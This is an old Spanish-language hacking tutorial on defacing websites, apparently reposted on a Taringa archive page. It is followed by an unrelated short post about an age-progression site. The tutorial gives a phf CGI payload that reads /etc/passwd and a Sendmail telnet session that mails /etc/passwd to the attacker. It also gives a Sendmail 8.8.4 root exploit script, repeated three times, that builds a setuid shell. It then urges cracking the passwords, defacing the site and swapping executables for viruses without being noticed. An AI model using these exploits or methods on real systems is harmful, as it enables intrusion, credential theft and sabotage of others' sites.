pesar de poder abrirse cuenta de acceso a internet, leer correos electrónicos etc... solo cambió la página web. el servidor en cuestión es conexión global internet (http://www.cglobal.com) aunque el nombre cambió durante un día por "conexión mamadón internet" hehehe... ya no tienen ftp anonimo. (mira a ver). es que los hay capullos. Por probar que no quede. A probar todo lo que se te ocurra. Si el servidor es de WinNT mejor que mejor! más rápido caerá. probar con directorios ocultos tipo: /root /pub /bin /etc /administrador /administrator /lo que se te ocurra. Hay otros métodos, los más eficaces (y más complicados) por Telnel, pero lo dejaré para números siguientes. Ok ? bye! BlackJack 97 Light Cracking Distribution http://www.redestb.es/personal/lcd ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» º º +++ Azum Lord +++ º º HACKEANDO WEB'S º º º º http://members.tripod.com/~jleg/logos/wlm.html º º º AzumLord@bigfoot.com º º º º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ CONTENIDOS 1.- Disclaimer 2.- Introduccion 3.- Comenzando el ataque 4.- Obtencion del fichero de Passwd 5.- Usando Exploits 6.- Y recuerda.... @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% DISCLAIMER @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% El contenido de este texto esta solamente destinado a usos educacionales, de investigacion y de desarrollo. En ningun momento el creador de este texto se hace responsable de los da¤os causados debido a un mal uso de el mismo. @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% INTRODUCCION @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% Si alguna vez se te ha ocurrido que seria divertido cambiar algunas cuantas cosillas de alguna web o de adue¤arte de alguna, este texto es para ti. Si tu enemigo tiene una web y quieres acabar con ella este texto es para ti. O si simplemente quieres conocer las posibilidades del hacking este texto es para ti. @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% COMENZANDO EL ATAQUE @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% Lo primero que hay hacer es localizar al servidor victima... (e.j.) http://www.victima.com <----------- Victima Despues recopila la mayor cantidad de informacion sobre el servidor victima por ejemplo su IP, DNS, version de Sendmail, etc. La mayoria de las veces el servidor que contiene la web-page del site solo tiene unos cuantos logins como el del root y el de algunos cuantos administradores pero para saber cuales y cuantos usuarios, necesitas el fichero de passwd. @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% OBTENCION DEL FICHERO DE PASSWD @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% Hay varias formas de entrar, una de ellas seria obteniendo el archivo de passwd pero como? bueno he aqui algunas formas. Nota para Newbies: Si entras al servidor por ftp con el usuario anonymous y te vas al directorio /etc y te encuentras el fichero passwd no te emociones este fichero solo es basura el fichero correcto esta en: /home/ftp/etc/passwd <--------- Basura que encuentras si entras por anonymous /etc/passwd <------------------ Fichero correcto de passwd. Hay muchas formas de obtener el fichero de passwd como por ejemplo con el phf: http://www.elsitevictima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd ( 1 )( 2 )( 3 )( 4 )(5)( 6 ) 1.- El site que quieras atacar. 2.- El comando phf. 3.- Aqui es donde esta el secreto. 4.- El programa que quieres que se ejecute. 5.- El %20 es un espacio. 6.- Y pues aqui va el archivo o directorio que quieres ver. O tambien con exploits, este es para obtener el fichero de passwd de servidores con Sendmail con versiones anteriores a la 5.57 % telnet victima.com 25 Trying 255.255.255.0... Connected to victima.com Escape character is '^]'. 220 victima.com Sendmail 5.55 ready at Sunday, 12 Sept 97 12:09 mail from: "|/bin/mail tudireccion@decorreo.com < /etc/passwd 250 "|/bin/mail tudireccion@decorreo.com < /etc/passwd"... Sender ok rcpt to: Aqui_pon_lo_que_se_te_antoje. 550 Aqui_pon_lo_que_se_te_antoje.... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Connection closed by foreign host. % Despues crackeas el fichero de passwd con cualquier crackeador como el Jack the Ripper o el que acostumbres usar y si sacas alguna de las cuentas telnetea: %telnet %o (to)www.victima.com Trying 255.255.255.0 .... Escape character is '^]'. Linux 2.0.0 (www.victima.com) (tty2) login:XXXXXXXX passwd:XXXXXXXX @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% USANDO EXPLOITS @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% La forma mas sencilla de hackear una web-page es usando exploits he aqui uno que te hara root en Sendmail 8.8.4. --------------------------------- CORTA AQUI --------------------------------- cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include<stdio.h> main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"; } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include<stdio.h> main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ > # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"; } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include<stdio.h> main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"; } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi --------------------------------- CORTA AQUI --------------------------------- Hay infinidad de exploits como este en la red si deseas links a paginas que continen cientos revisa la seccion de links de la revista Raregazz. @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% Y RECUERDA ... @%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@% Bien ya tengo el root o una cuenta de algun administrador ahora que?, pues ahora sigue la parte mas divertida. Estando como root bajas todos los archivos de la pagina y despues los editas cada archivo guardalo con el mismo nombre que tenia para ahorrarte trabajo, luego editas la web-page. Usa tu imaginzacion por ejemplo si hay archivos executables remplazalos por virus cambia los links modifica las imagenes etc. ahora reemplazas los antiguos archivos por los nuevos recuerda que el chiste es hacer cambios que no llamen mucho la atencion para que los Admins no se den cuenta y dure mas tiempo. Y recuerda |-|4cK t|-|3 //0r1d .... FUENTE: www.elhacker.net TheozZz no se hace responsable por el mal uso de este articulo con fines de ciencia y educación.

0
0
E
Envejecer tu rostro 20 años con In20years
TaringaporAnónimo7/11/2010

¿Te gustaría saber como serás en un par de años? In20years es un sitio web que envejecer una fotagrafía con tu rostro, añadiendo 20 años a tu espalda (?). El sitio web genera una simulación bastante real en base a unas simples opciones, tal cual como se puede apreciar en la siguiente imagen: Entre las opciones que nos requiere la página para generar la simulación se encuentran sexo, edad aproximada y adicción a las drogas. Obviamente, requiere una imagen frontal de nuestro rostro para poder obtener un óptimo resultado. Enlace:http://in20years.com/

0
0
PosteameloArchivo Histórico de Taringa! (2004-2017). Preservando la inteligencia colectiva de la internet hispanohablante.

CONTACTO

18 de Septiembre 455, Casilla 52

Chillán, Región de Ñuble, Chile

Solo correo postal

© 2026 Posteamelo.com. No afiliado con Taringa! ni sus sucesores.

Contenido preservado con fines históricos y culturales.